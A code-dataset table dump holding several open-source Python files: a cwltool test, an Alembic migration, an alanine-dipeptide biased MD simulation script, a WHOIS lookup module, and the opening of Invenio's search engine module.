text
stringlengths 6
947k
| repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
|
|---|---|---|---|---|---|---|
from io import StringIO
from pathlib import Path
from cwltool.main import main
from .util import get_data
def test_empty_input(tmp_path: Path) -> None:
"""Affirm that an empty input works."""
empty_json = "{}"
empty_input = StringIO(empty_json)
params = [
"--outdir",
str(tmp_path),
get_data("tests/wf/no-parameters-echo.cwl"),
"-",
]
try:
assert main(params, stdin=empty_input) == 0
except SystemExit as err:
assert err.code == 0
|
common-workflow-language/cwltool
|
tests/test_empty_input.py
|
Python
|
apache-2.0
| 513
| 0
|
""" Extend suppliers table with new fields (to be initially populated from declaration data)
Revision ID: 940
Revises: 930
Create Date: 2017-08-16 16:39:00.000000
"""
# revision identifiers, used by Alembic.
revision = '940'
down_revision = '930'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column(u'suppliers', sa.Column('registered_name', sa.String(), nullable=True))
op.add_column(u'suppliers', sa.Column('registration_country', sa.String(), nullable=True))
op.add_column(u'suppliers', sa.Column('other_company_registration_number', sa.String(), nullable=True))
op.add_column(u'suppliers', sa.Column('registration_date', sa.DateTime(), nullable=True))
op.add_column(u'suppliers', sa.Column('vat_number', sa.String(), nullable=True))
op.add_column(u'suppliers', sa.Column('organisation_size', sa.String(), nullable=True))
op.add_column(u'suppliers', sa.Column('trading_status', sa.String(), nullable=True))
def downgrade():
op.drop_column(u'suppliers', 'registered_name')
op.drop_column(u'suppliers', 'registration_country')
op.drop_column(u'suppliers', 'other_company_registration_number')
op.drop_column(u'suppliers', 'registration_date')
op.drop_column(u'suppliers', 'vat_number')
op.drop_column(u'suppliers', 'organisation_size')
op.drop_column(u'suppliers', 'trading_status')
|
alphagov/digitalmarketplace-api
|
migrations/versions/940_more_supplier_details.py
|
Python
|
mit
| 1,372
| 0.007289
|
"""
This file is for biased simulation for alanine dipeptide only, it is used as the test for
more general file biased_simulation_general.py, which could be easily extend to other new
systems.
"""
from ANN_simulation import *
from simtk.openmm.app import *
from simtk.openmm import *
from simtk.unit import *
from sys import stdout
import ast, argparse
import os
import datetime
from config import *
parser = argparse.ArgumentParser()
parser.add_argument("record_interval", type=int, help="interval to take snapshots")
parser.add_argument("total_num_of_steps", type=int, help="total number of simulation steps")
parser.add_argument("force_constant", type=float, help="force constants")
parser.add_argument("folder_to_store_output_files", type=str, help="folder to store the output pdb and report files")
parser.add_argument("autoencoder_info_file", type=str, help="file to store autoencoder information (coefficients)")
parser.add_argument("pc_potential_center", type=str, help="potential center (should include 'pc_' as prefix)")
parser.add_argument("--out_traj", type=str, default=None, help="output trajectory file")
parser.add_argument("--layer_types", type=str, default=str(CONFIG_27), help='layer types')
parser.add_argument("--num_of_nodes", type=str, default=str(CONFIG_3[:3]), help='number of nodes in each layer')
parser.add_argument("--temperature", type=int, default= CONFIG_21, help='simulation temperature')
parser.add_argument("--data_type_in_input_layer", type=int, default=1, help='data_type_in_input_layer, 0 = cos/sin, 1 = Cartesian coordinates')
parser.add_argument("--platform", type=str, default=CONFIG_23, help='platform on which the simulation is run')
parser.add_argument("--scaling_factor", type=float, default = float(CONFIG_49), help='scaling_factor for ANN_Force')
parser.add_argument("--starting_pdb_file", type=str, default='../resources/alanine_dipeptide.pdb', help='the input pdb file to start simulation')
parser.add_argument("--starting_frame", type=int, default=0, help="index of starting frame in the starting pdb file")
parser.add_argument("--minimize_energy", type=int, default=1, help='whether to minimize energy (1 = yes, 0 = no)')
parser.add_argument("--equilibration_steps", type=int, default=1000, help="number of steps for the equilibration process")
# next few options are for metadynamics
parser.add_argument("--bias_method", type=str, default='US', help="biasing method for enhanced sampling, US = umbrella sampling, MTD = metadynamics")
parser.add_argument("--MTD_pace", type=int, default=CONFIG_66, help="pace of metadynamics")
parser.add_argument("--MTD_height", type=float, default=CONFIG_67, help="height of metadynamics")
parser.add_argument("--MTD_sigma", type=float, default=CONFIG_68, help="sigma of metadynamics")
parser.add_argument("--MTD_WT", type=int, default=CONFIG_69, help="whether to use well-tempered version")
parser.add_argument("--MTD_biasfactor", type=float, default=CONFIG_70, help="biasfactor of well-tempered metadynamics")
# following is for plumed script
parser.add_argument("--plumed_file", type=str, default=None, help="plumed script for biasing force, used only when the bias_method == plumed_other")
parser.add_argument("--plumed_add_string", type=str, default="", help="additional string to be attached to the end of plumed script in args.plumed_file")
# note on "force_constant_adjustable" mode:
# the simulation will stop if either:
# force constant is greater or equal to max_force_constant
# or distance between center of data cloud and potential center is smaller than distance_tolerance
parser.add_argument("--fc_adjustable", help="set the force constant to be adjustable", action="store_true")
parser.add_argument("--max_fc", type=float, default=CONFIG_32, help="max force constant (for force_constant_adjustable mode)")
parser.add_argument("--fc_step", type=float, default=CONFIG_34, help="the value by which the force constant is increased each time (for force_constant_adjustable mode)")
parser.add_argument("--distance_tolerance", type=float, default=CONFIG_35, help="max distance allowed between center of data cloud and potential center (for force_constant_adjustable mode)")
parser.add_argument("--autoencoder_file", type=str, help="pkl file that stores autoencoder (for force_constant_adjustable mode)")
parser.add_argument("--remove_previous", help="remove previous outputs while adjusting force constants", action="store_true")
args = parser.parse_args()
record_interval = args.record_interval
total_number_of_steps = args.total_num_of_steps
input_data_type = ['cossin', 'Cartesian', 'pairwise'][args.data_type_in_input_layer]
force_constant = args.force_constant
scaling_factor = args.scaling_factor
layer_types = re.sub("\[|\]|\"|\'| ",'', args.layer_types).split(',')
num_of_nodes = re.sub("\[|\]|\"|\'| ",'', args.num_of_nodes).split(',')
num_of_nodes = [int(item) for item in num_of_nodes]
out_format = '.dcd' if args.out_traj is None else os.path.splitext(args.out_traj)[1]
if float(force_constant) != 0:
from ANN import *
folder_to_store_output_files = args.folder_to_store_output_files # this is used to separate outputs for different networks into different folders
autoencoder_info_file = args.autoencoder_info_file
potential_center = list([float(x) for x in args.pc_potential_center.replace('"','')\
.replace('pc_','').split(',')]) # this API is the generalization for higher-dimensional cases
if not os.path.exists(folder_to_store_output_files):
try: os.makedirs(folder_to_store_output_files)
except: pass
def run_simulation(force_constant):
assert(os.path.exists(folder_to_store_output_files))
input_pdb_file_of_molecule = args.starting_pdb_file
force_field_file = 'amber99sb.xml'
water_field_file = 'tip3p.xml'
pdb_reporter_file = '%s/output_fc_%f_pc_%s.pdb' %(folder_to_store_output_files, force_constant, str(potential_center).replace(' ',''))
if not args.out_traj is None:
pdb_reporter_file = args.out_traj
state_data_reporter_file = pdb_reporter_file.replace('output_fc', 'report_fc').replace('.pdb', '.txt')
# check if the file exist
for item_filename in [pdb_reporter_file, state_data_reporter_file]:
Helper_func.backup_rename_file_if_exists(item_filename)
index_of_backbone_atoms = CONFIG_57[0]
flag_random_seed = 0 # whether we need to fix this random seed
simulation_temperature = args.temperature
time_step = CONFIG_22 # simulation time step, in ps
pdb = PDBFile(input_pdb_file_of_molecule)
modeller = Modeller(pdb.topology, pdb.getPositions(frame=args.starting_frame))
solvent_opt = 'no_water'
if solvent_opt == 'explicit':
forcefield = ForceField(force_field_file, water_field_file)
modeller.addSolvent(forcefield, model=water_field_file.split('.xml')[0], boxSize=Vec3(3, 3, 3) * nanometers,
ionicStrength=0 * molar)
system = forcefield.createSystem(modeller.topology, nonbondedMethod=PME, nonbondedCutoff=1.0 * nanometers,
constraints=AllBonds, ewaldErrorTolerance=0.0005)
else:
forcefield = ForceField(force_field_file)
system = forcefield.createSystem(modeller.topology, nonbondedMethod=NoCutoff, constraints=AllBonds)
if args.bias_method == "US":
if float(force_constant) != 0:
force = ANN_Force()
force.set_layer_types(layer_types)
force.set_data_type_in_input_layer(args.data_type_in_input_layer)
force.set_list_of_index_of_atoms_forming_dihedrals_from_index_of_backbone_atoms(index_of_backbone_atoms)
force.set_index_of_backbone_atoms(index_of_backbone_atoms)
if args.data_type_in_input_layer == 2:
force.set_list_of_pair_index_for_distances(CONFIG_80)
force.set_num_of_nodes(num_of_nodes)
force.set_potential_center(potential_center)
force.set_force_constant(float(force_constant))
unit_scaling = 1.0 # TODO: check unit scaling
force.set_scaling_factor(float(scaling_factor) / unit_scaling) # since default unit is nm in OpenMM
# TODO: need to fix following for multi-hidden layer cases
temp_coeffs, temp_bias = np.load(autoencoder_info_file)
for item_layer_index in [0, 1]:
assert (len(temp_coeffs[item_layer_index]) ==
num_of_nodes[item_layer_index] * num_of_nodes[item_layer_index + 1]), (len(temp_coeffs[item_layer_index]),
(num_of_nodes[item_layer_index], num_of_nodes[item_layer_index + 1]))
assert (len(temp_bias[item_layer_index]) == num_of_nodes[item_layer_index + 1]), (len(temp_bias[item_layer_index]), num_of_nodes[item_layer_index + 1])
# need tolist() since C++ only accepts Python list
force.set_coeffients_of_connections([item_w.tolist() for item_w in temp_coeffs])
force.set_values_of_biased_nodes([item_w.tolist() for item_w in temp_bias])
system.addForce(force)
elif args.bias_method == "US_on_phipsi":
from openmmplumed import PlumedForce
kappa_string = ','.join([str(force_constant) for _ in potential_center])
plumed_force_string = """
phi: TORSION ATOMS=5,7,9,15
psi: TORSION ATOMS=7,9,15,17
restraint: RESTRAINT ARG=phi,psi AT=%f,%f KAPPA=%s
PRINT STRIDE=10 ARG=* FILE=COLVAR
""" % (potential_center[0], potential_center[1], kappa_string)
system.addForce(PlumedForce(plumed_force_string))
elif args.bias_method == "MTD":
from openmmplumed import PlumedForce
plumed_force_string = Alanine_dipeptide.get_expression_script_for_plumed()
with open(autoencoder_info_file, 'r') as f_in:
plumed_force_string += f_in.read()
# note that dimensionality of MTD is determined by potential_center string
plumed_script_ANN_mode = 'ANN'
if plumed_script_ANN_mode == 'native':
mtd_output_layer_string = ['l_2_out_%d' % item for item in range(len(potential_center))]
elif plumed_script_ANN_mode == 'ANN':
mtd_output_layer_string = ['ann_force.%d' % item for item in range(len(potential_center))]
else: raise Exception('mode error')
mtd_output_layer_string = ','.join(mtd_output_layer_string)
mtd_sigma_string = ','.join([str(args.MTD_sigma) for _ in range(len(potential_center))])
if args.MTD_WT:
mtd_well_tempered_string = 'TEMP=%d BIASFACTOR=%f' % (args.temperature, args.MTD_biasfactor)
else:
mtd_well_tempered_string = ""
plumed_force_string += """
metad: METAD ARG=%s PACE=%d HEIGHT=%f SIGMA=%s FILE=temp_MTD_hills.txt %s
PRINT STRIDE=%d ARG=%s,metad.bias FILE=temp_MTD_out.txt
""" % (mtd_output_layer_string, args.MTD_pace, args.MTD_height, mtd_sigma_string, mtd_well_tempered_string,
record_interval, mtd_output_layer_string)
# print plumed_force_string
system.addForce(PlumedForce(plumed_force_string))
elif args.bias_method == "SMD":
# TODO: this is temporary version
from openmmplumed import PlumedForce
kappa_string = '1000,1000'
plumed_force_string = """
phi: TORSION ATOMS=5,7,9,15
psi: TORSION ATOMS=7,9,15,17
restraint: MOVINGRESTRAINT ARG=phi,psi AT0=-1.5,1.0 STEP0=0 KAPPA0=%s AT1=1.0,-1.0 STEP1=%d KAPPA1=%s
PRINT STRIDE=10 ARG=* FILE=COLVAR
""" % (kappa_string, total_number_of_steps, kappa_string)
system.addForce(PlumedForce(plumed_force_string))
elif args.bias_method == "TMD": # targeted MD
# TODO: this is temporary version
from openmmplumed import PlumedForce
kappa_string = '10000'
plumed_force_string = """
phi: TORSION ATOMS=5,7,9,15
psi: TORSION ATOMS=7,9,15,17
rmsd: RMSD REFERENCE=../resources/alanine_ref_1_TMD.pdb TYPE=OPTIMAL
restraint: MOVINGRESTRAINT ARG=rmsd AT0=0 STEP0=0 KAPPA0=0 AT1=0 STEP1=%d KAPPA1=%s
PRINT STRIDE=10 ARG=* FILE=COLVAR
""" % (total_number_of_steps, kappa_string)
system.addForce(PlumedForce(plumed_force_string))
elif args.bias_method == "plumed_other":
from openmmplumed import PlumedForce
with open(args.plumed_file, 'r') as f_in:
plumed_force_string = f_in.read().strip() + args.plumed_add_string
system.addForce(PlumedForce(plumed_force_string))
else:
raise Exception('bias method error')
# end of biased force
integrator = LangevinIntegrator(simulation_temperature*kelvin, 1/picosecond, time_step*picoseconds)
if flag_random_seed:
integrator.setRandomNumberSeed(1) # set random seed
platform = Platform.getPlatformByName(args.platform)
platform.loadPluginsFromDirectory(CONFIG_25) # load the plugin from specific directory
simulation = Simulation(modeller.topology, system, integrator, platform)
simulation.context.setPositions(modeller.positions)
if args.minimize_energy:
print('begin Minimizing energy...')
print(datetime.datetime.now())
simulation.minimizeEnergy()
print('Done minimizing energy.')
print(datetime.datetime.now())
else:
print('energy minimization not required')
simulation.step(args.equilibration_steps)
if out_format == '.pdb':
simulation.reporters.append(PDBReporter(pdb_reporter_file, record_interval))
elif out_format == '.dcd':
simulation.reporters.append(DCDReporter(pdb_reporter_file.replace('.pdb', '.dcd'), record_interval))
simulation.reporters.append(StateDataReporter(state_data_reporter_file, record_interval,
step=True, potentialEnergy=True, kineticEnergy=True, speed=True,
temperature=True, progress=True, remainingTime=True,
totalSteps=total_number_of_steps + args.equilibration_steps,
))
simulation.step(total_number_of_steps)
print('Done biased simulation!')
return pdb_reporter_file
def get_distance_between_data_cloud_center_and_potential_center(pdb_file):
coor_file = Alanine_dipeptide().generate_coordinates_from_pdb_files(pdb_file)[0]
temp_network = autoencoder.load_from_pkl_file(args.autoencoder_file)
this_simulation_data = single_biased_simulation_data(temp_network, coor_file)
offset = this_simulation_data.get_offset_between_potential_center_and_data_cloud_center(input_data_type)
if layer_types[1] == "Circular":
offset = [min(abs(item), abs(item + 2 * np.pi), abs(item - 2 * np.pi)) for item in offset]
print("circular offset")
print('offset = %s' % str(offset))
distance = sqrt(sum([item * item for item in offset]))
return distance
def run_simulation_ssages(force_constant):
ssages_output_file = '%s/output_fc_%f_pc_%s.json' % (
folder_to_store_output_files, force_constant, str(potential_center).replace(' ', ''))
subprocess.check_output('python ../src/temp_create_json_ssages.py %s %s %s %s %s' % (
ssages_output_file, str(potential_center).replace(' ', ''), autoencoder_info_file.replace('.npy', '.txt'),
ssages_output_file.replace('.json', '.trr'), force_constant), shell=True)
command = "ssages " + ssages_output_file
subprocess.check_output(command, shell=True)
pdb_reporter_file = ssages_output_file.replace('.json', '.pdb')
subprocess.check_output('mdconvert -o %s %s -t ../resources/alanine_dipeptide.pdb' % (
pdb_reporter_file, pdb_reporter_file.replace('.pdb', '.trr')), shell = True)
return pdb_reporter_file
if __name__ == '__main__':
if not args.fc_adjustable:
run_simulation(args.force_constant)
else:
force_constant = args.force_constant
distance_of_data_cloud_center = float("inf")
while force_constant < args.max_fc and distance_of_data_cloud_center > args.distance_tolerance:
if args.remove_previous:
try:
command = 'rm %s/*%s*' % (folder_to_store_output_files, str(potential_center).replace(' ',''))
command = command.replace('[','').replace(']','')
subprocess.check_output(command, shell=True)
print("removing previous results...")
except:
pass
pdb_file = run_simulation(force_constant)
distance_of_data_cloud_center = get_distance_between_data_cloud_center_and_potential_center(pdb_file)
force_constant += args.fc_step
print("distance_between_data_cloud_center_and_potential_center = %f" % distance_of_data_cloud_center)
|
weiHelloWorld/accelerated_sampling_with_autoencoder
|
MD_simulation_on_alanine_dipeptide/current_work/src/biased_simulation.py
|
Python
|
mit
| 16,759
| 0.007101
|
import socket, re, sys
from codecs import encode, decode
from . import shared
def get_whois_raw(domain, server="", previous=None, rfc3490=True, never_cut=False, with_server_list=False, server_list=None):
previous = previous or []
server_list = server_list or []
# Sometimes IANA simply won't give us the right root WHOIS server
exceptions = {
".ac.uk": "whois.ja.net",
".ps": "whois.pnina.ps",
".buzz": "whois.nic.buzz",
".moe": "whois.nic.moe",
# The following is a bit hacky, but IANA won't return the right answer for example.com because it's a direct registration.
"example.com": "whois.verisign-grs.com"
}
if rfc3490:
if sys.version_info < (3, 0):
domain = encode( domain if type(domain) is unicode else decode(domain, "utf8"), "idna" )
else:
domain = encode(domain, "idna").decode("ascii")
if len(previous) == 0 and server == "":
# Root query
is_exception = False
for exception, exc_serv in exceptions.items():
if domain.endswith(exception):
is_exception = True
target_server = exc_serv
break
if is_exception == False:
target_server = get_root_server(domain)
else:
target_server = server
if target_server == "whois.jprs.jp":
request_domain = "%s/e" % domain # Suppress Japanese output
elif domain.endswith(".de") and ( target_server == "whois.denic.de" or target_server == "de.whois-servers.net" ):
request_domain = "-T dn,ace %s" % domain # regional specific stuff
elif target_server == "whois.verisign-grs.com":
request_domain = "=%s" % domain # Avoid partial matches
else:
request_domain = domain
response = whois_request(request_domain, target_server)
if never_cut:
# If the caller has requested to 'never cut' responses, he will get the original response from the server (this is
# useful for callers that are only interested in the raw data). Otherwise, if the target is verisign-grs, we will
# select the data relevant to the requested domain, and discard the rest, so that in a multiple-option response the
# parsing code will only touch the information relevant to the requested domain. The side-effect of this is that
# when `never_cut` is set to False, any verisign-grs responses in the raw data will be missing header, footer, and
# alternative domain options (this is handled a few lines below, after the verisign-grs processing).
new_list = [response] + previous
if target_server == "whois.verisign-grs.com":
# VeriSign is a little... special. As it may return multiple full records and there's no way to do an exact query,
# we need to actually find the correct record in the list.
for record in response.split("\n\n"):
if re.search("Domain Name: %s\n" % domain.upper(), record):
response = record
break
if never_cut == False:
new_list = [response] + previous
server_list.append(target_server)
for line in [x.strip() for x in response.splitlines()]:
match = re.match("(refer|whois server|referral url|whois server|registrar whois):\s*([^\s]+\.[^\s]+)", line, re.IGNORECASE)
if match is not None:
referal_server = match.group(2)
if referal_server != server and "://" not in referal_server: # We want to ignore anything non-WHOIS (eg. HTTP) for now.
# Referal to another WHOIS server...
return get_whois_raw(domain, referal_server, new_list, server_list=server_list, with_server_list=with_server_list)
if with_server_list:
return (new_list, server_list)
else:
return new_list
def get_root_server(domain):
data = whois_request(domain, "whois.iana.org")
for line in [x.strip() for x in data.splitlines()]:
match = re.match("refer:\s*([^\s]+)", line)
if match is None:
continue
return match.group(1)
raise shared.WhoisException("No root WHOIS server found for domain.")
def whois_request(domain, server, port=43):
socket.setdefaulttimeout(5)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((server, port))
sock.send(("%s\r\n" % domain).encode("utf-8"))
buff = b""
while True:
data = sock.recv(1024)
if len(data) == 0:
break
buff += data
return buff.decode("utf-8")
|
goocarlos/domaindiscoverer
|
pythonwhois/net.py
|
Python
|
apache-2.0
| 4,072
| 0.030452
|
# -*- coding: utf-8 -*-
## This file is part of Invenio.
## Copyright (C) 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
# pylint: disable=C0301
"""Invenio Search Engine in mod_python."""
__lastupdated__ = """$Date$"""
__revision__ = "$Id$"
## import general modules:
import cgi
import cStringIO
import copy
import string
import os
import re
import time
import urllib
import urlparse
import zlib
import sys
try:
## import optional module:
import numpy
CFG_NUMPY_IMPORTABLE = True
except:
CFG_NUMPY_IMPORTABLE = False
if sys.hexversion < 0x2040000:
# pylint: disable=W0622
from sets import Set as set
# pylint: enable=W0622
## import Invenio stuff:
from invenio.config import \
CFG_CERN_SITE, \
CFG_INSPIRE_SITE, \
CFG_OAI_ID_FIELD, \
CFG_WEBCOMMENT_ALLOW_REVIEWS, \
CFG_WEBSEARCH_CALL_BIBFORMAT, \
CFG_WEBSEARCH_CREATE_SIMILARLY_NAMED_AUTHORS_LINK_BOX, \
CFG_WEBSEARCH_FIELDS_CONVERT, \
CFG_WEBSEARCH_NB_RECORDS_TO_SORT, \
CFG_WEBSEARCH_SEARCH_CACHE_SIZE, \
CFG_WEBSEARCH_SEARCH_CACHE_TIMEOUT, \
CFG_WEBSEARCH_USE_MATHJAX_FOR_FORMATS, \
CFG_WEBSEARCH_USE_ALEPH_SYSNOS, \
CFG_WEBSEARCH_DEF_RECORDS_IN_GROUPS, \
CFG_WEBSEARCH_FULLTEXT_SNIPPETS, \
CFG_WEBSEARCH_DISPLAY_NEAREST_TERMS, \
CFG_WEBSEARCH_WILDCARD_LIMIT, \
CFG_BIBUPLOAD_SERIALIZE_RECORD_STRUCTURE, \
CFG_BIBUPLOAD_EXTERNAL_SYSNO_TAG, \
CFG_BIBRANK_SHOW_DOWNLOAD_GRAPHS, \
CFG_WEBSEARCH_SYNONYM_KBRS, \
CFG_SITE_LANG, \
CFG_SITE_NAME, \
CFG_LOGDIR, \
CFG_BIBFORMAT_HIDDEN_TAGS, \
CFG_SITE_URL, \
CFG_ACCESS_CONTROL_LEVEL_ACCOUNTS, \
CFG_SOLR_URL, \
CFG_WEBSEARCH_DETAILED_META_FORMAT, \
CFG_SITE_RECORD, \
CFG_WEBSEARCH_PREV_NEXT_HIT_LIMIT, \
CFG_WEBSEARCH_VIEWRESTRCOLL_POLICY, \
CFG_BIBSORT_BUCKETS, \
CFG_XAPIAN_ENABLED, \
CFG_BIBINDEX_CHARS_PUNCTUATION
from invenio.search_engine_config import \
InvenioWebSearchUnknownCollectionError, \
InvenioWebSearchWildcardLimitError, \
CFG_WEBSEARCH_IDXPAIRS_FIELDS,\
CFG_WEBSEARCH_IDXPAIRS_EXACT_SEARCH, \
CFG_SEARCH_RESULTS_CACHE_PREFIX
from invenio.search_engine_utils import get_fieldvalues, get_fieldvalues_alephseq_like
from invenio.bibrecord import create_record, record_xml_output
from invenio.bibrank_record_sorter import get_bibrank_methods, is_method_valid, rank_records as rank_records_bibrank
from invenio.bibrank_downloads_similarity import register_page_view_event, calculate_reading_similarity_list
from invenio.bibindex_engine_stemmer import stem
from invenio.bibindex_tokenizers.BibIndexDefaultTokenizer import BibIndexDefaultTokenizer
from invenio.bibindex_tokenizers.BibIndexCJKTokenizer import BibIndexCJKTokenizer, is_there_any_CJK_character_in_text
from invenio.bibindex_engine_utils import author_name_requires_phrase_search
from invenio.bibindex_engine_washer import wash_index_term, lower_index_term, wash_author_name
from invenio.bibindex_engine_config import CFG_BIBINDEX_SYNONYM_MATCH_TYPE
from invenio.bibindex_engine_utils import get_idx_indexer
from invenio.bibformat import format_record, format_records, get_output_format_content_type, create_excel
from invenio.bibformat_config import CFG_BIBFORMAT_USE_OLD_BIBFORMAT
from invenio.bibrank_downloads_grapher import create_download_history_graph_and_box
from invenio.bibknowledge import get_kbr_values
from invenio.data_cacher import DataCacher
from invenio.websearch_external_collections import print_external_results_overview, perform_external_collection_search
from invenio.access_control_admin import acc_get_action_id
from invenio.access_control_config import VIEWRESTRCOLL, \
CFG_ACC_GRANT_AUTHOR_RIGHTS_TO_EMAILS_IN_TAGS, \
CFG_ACC_GRANT_VIEWER_RIGHTS_TO_EMAILS_IN_TAGS
from invenio.websearchadminlib import get_detailed_page_tabs, get_detailed_page_tabs_counts
from invenio.intbitset import intbitset
from invenio.dbquery import DatabaseError, deserialize_via_marshal, InvenioDbQueryWildcardLimitError
from invenio.access_control_engine import acc_authorize_action
from invenio.errorlib import register_exception
from invenio.textutils import encode_for_xml, wash_for_utf8, strip_accents
from invenio.htmlutils import get_mathjax_header
from invenio.htmlutils import nmtoken_from_string
import invenio.template
webstyle_templates = invenio.template.load('webstyle')
webcomment_templates = invenio.template.load('webcomment')
from invenio.bibrank_citation_searcher import calculate_cited_by_list, \
calculate_co_cited_with_list, get_records_with_num_cites, get_self_cited_by, \
get_refersto_hitset, get_citedby_hitset
from invenio.bibrank_citation_grapher import create_citation_history_graph_and_box
from invenio.dbquery import run_sql, run_sql_with_limit, wash_table_column_name, \
get_table_update_time
from invenio.webuser import getUid, collect_user_info, session_param_set
from invenio.webpage import pageheaderonly, pagefooteronly, create_error_box, write_warning
from invenio.messages import gettext_set_language
from invenio.search_engine_query_parser import SearchQueryParenthesisedParser, \
SpiresToInvenioSyntaxConverter
from invenio import webinterface_handler_config as apache
from invenio.solrutils_bibindex_searcher import solr_get_bitset
from invenio.xapianutils_bibindex_searcher import xapian_get_bitset
try:
import invenio.template
websearch_templates = invenio.template.load('websearch')
except:
pass
from invenio.websearch_external_collections import calculate_hosted_collections_results, do_calculate_hosted_collections_results
from invenio.websearch_external_collections_config import CFG_HOSTED_COLLECTION_TIMEOUT_ANTE_SEARCH
from invenio.websearch_external_collections_config import CFG_HOSTED_COLLECTION_TIMEOUT_POST_SEARCH
from invenio.websearch_external_collections_config import CFG_EXTERNAL_COLLECTION_MAXRESULTS
VIEWRESTRCOLL_ID = acc_get_action_id(VIEWRESTRCOLL)
## global vars:
cfg_nb_browse_seen_records = 100 # limit of the number of records to check when browsing certain collection
cfg_nicely_ordered_collection_list = 0 # do we propose collection list nicely ordered or alphabetical?
## precompile some often-used regexp for speed reasons:
re_word = re.compile('[\s]')
re_quotes = re.compile('[\'\"]')
re_doublequote = re.compile('\"')
re_logical_and = re.compile('\sand\s', re.I)
re_logical_or = re.compile('\sor\s', re.I)
re_logical_not = re.compile('\snot\s', re.I)
re_operators = re.compile(r'\s([\+\-\|])\s')
re_pattern_wildcards_after_spaces = re.compile(r'(\s)[\*\%]+')
re_pattern_single_quotes = re.compile("'(.*?)'")
re_pattern_double_quotes = re.compile("\"(.*?)\"")
re_pattern_parens_quotes = re.compile(r'[\'\"]{1}[^\'\"]*(\([^\'\"]*\))[^\'\"]*[\'\"]{1}')
re_pattern_regexp_quotes = re.compile("\/(.*?)\/")
re_pattern_spaces_after_colon = re.compile(r'(:\s+)')
re_pattern_short_words = re.compile(r'([\s\"]\w{1,3})[\*\%]+')
re_pattern_space = re.compile("__SPACE__")
re_pattern_today = re.compile("\$TODAY\$")
re_pattern_parens = re.compile(r'\([^\)]+\s+[^\)]+\)')
re_punctuation_followed_by_space = re.compile(CFG_BIBINDEX_CHARS_PUNCTUATION + '\s')
## em possible values
EM_REPOSITORY={"body" : "B",
"header" : "H",
"footer" : "F",
"search_box" : "S",
"see_also_box" : "L",
"basket" : "K",
"alert" : "A",
"search_info" : "I",
"overview" : "O",
"all_portalboxes" : "P",
"te_portalbox" : "Pte",
"tp_portalbox" : "Ptp",
"np_portalbox" : "Pnp",
"ne_portalbox" : "Pne",
"lt_portalbox" : "Plt",
"rt_portalbox" : "Prt"};
class RestrictedCollectionDataCacher(DataCacher):
def __init__(self):
def cache_filler():
ret = []
try:
res = run_sql("""SELECT DISTINCT ar.value
FROM accROLE_accACTION_accARGUMENT raa JOIN accARGUMENT ar ON raa.id_accARGUMENT = ar.id
WHERE ar.keyword = 'collection' AND raa.id_accACTION = %s""", (VIEWRESTRCOLL_ID,), run_on_slave=True)
except Exception:
# database problems, return empty cache
return []
for coll in res:
ret.append(coll[0])
return ret
def timestamp_verifier():
return max(get_table_update_time('accROLE_accACTION_accARGUMENT'), get_table_update_time('accARGUMENT'))
DataCacher.__init__(self, cache_filler, timestamp_verifier)
def collection_restricted_p(collection, recreate_cache_if_needed=True):
if recreate_cache_if_needed:
restricted_collection_cache.recreate_cache_if_needed()
return collection in restricted_collection_cache.cache
try:
restricted_collection_cache.is_ok_p
except Exception:
restricted_collection_cache = RestrictedCollectionDataCacher()
def ziplist(*lists):
"""Just like zip(), but returns lists of lists instead of lists of tuples
Example:
zip([f1, f2, f3], [p1, p2, p3], [op1, op2, '']) =>
[(f1, p1, op1), (f2, p2, op2), (f3, p3, '')]
ziplist([f1, f2, f3], [p1, p2, p3], [op1, op2, '']) =>
[[f1, p1, op1], [f2, p2, op2], [f3, p3, '']]
FIXME: This is handy to have, and should live somewhere else, like
miscutil.really_useful_functions or something.
XXX: Starting in python 2.6, the same can be achieved (faster) by
using itertools.izip_longest(); when the minimum recommended Python
is bumped, we should use that instead.
"""
def l(*items):
return list(items)
return map(l, *lists)
def get_permitted_restricted_collections(user_info, recreate_cache_if_needed=True):
"""Return a list of collection that are restricted but for which the user
is authorized."""
if recreate_cache_if_needed:
restricted_collection_cache.recreate_cache_if_needed()
ret = []
for collection in restricted_collection_cache.cache:
if acc_authorize_action(user_info, 'viewrestrcoll', collection=collection)[0] == 0:
ret.append(collection)
return ret
def get_all_restricted_recids():
"""
Return the set of all the restricted recids, i.e. the ids of those records
which belong to at least one restricted collection.
"""
ret = intbitset()
for collection in restricted_collection_cache.cache:
ret |= get_collection_reclist(collection)
return ret
def get_restricted_collections_for_recid(recid, recreate_cache_if_needed=True):
"""
Return the list of restricted collection names to which recid belongs.
"""
if recreate_cache_if_needed:
restricted_collection_cache.recreate_cache_if_needed()
collection_reclist_cache.recreate_cache_if_needed()
return [collection for collection in restricted_collection_cache.cache if recid in get_collection_reclist(collection, recreate_cache_if_needed=False)]
def is_user_owner_of_record(user_info, recid):
"""
Check if the user is owner of the record, i.e. he is the submitter
and/or belongs to a owner-like group authorized to 'see' the record.
@param user_info: the user_info dictionary that describe the user.
@type user_info: user_info dictionary
@param recid: the record identifier.
@type recid: positive integer
@return: True if the user is 'owner' of the record; False otherwise
@rtype: bool
"""
authorized_emails_or_group = []
for tag in CFG_ACC_GRANT_AUTHOR_RIGHTS_TO_EMAILS_IN_TAGS:
authorized_emails_or_group.extend(get_fieldvalues(recid, tag))
for email_or_group in authorized_emails_or_group:
if email_or_group in user_info['group']:
return True
email = email_or_group.strip().lower()
if user_info['email'].strip().lower() == email:
return True
return False
###FIXME: This method needs to be refactorized
def is_user_viewer_of_record(user_info, recid):
"""
Check if the user is allow to view the record based in the marc tags
inside CFG_ACC_GRANT_VIEWER_RIGHTS_TO_EMAILS_IN_TAGS
i.e. his email is inside the 506__m tag or he is inside an e-group listed
in the 506__m tag
@param user_info: the user_info dictionary that describe the user.
@type user_info: user_info dictionary
